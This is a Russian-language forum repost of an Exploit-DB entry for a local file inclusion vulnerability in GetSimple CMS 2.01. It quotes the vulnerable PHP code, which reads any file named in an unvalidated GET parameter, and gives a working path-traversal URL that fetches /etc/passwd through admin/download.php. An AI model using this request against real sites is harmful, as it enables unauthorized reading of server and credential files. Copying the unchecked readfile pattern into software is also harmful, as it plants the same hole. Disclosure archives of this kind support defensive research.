Exploit Getsimple CMS 2.01 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12517
Проверка EDB
  1. Пройдено
Автор
BATCH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2010-05-06
Код:
# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01

#Special Conditions: Must be admin.
# Code :

...

# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;

...


http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd

#-Batch

#ryan1918.com
#Everyone else.
 
Источник
www.exploit-db.com

Похожие темы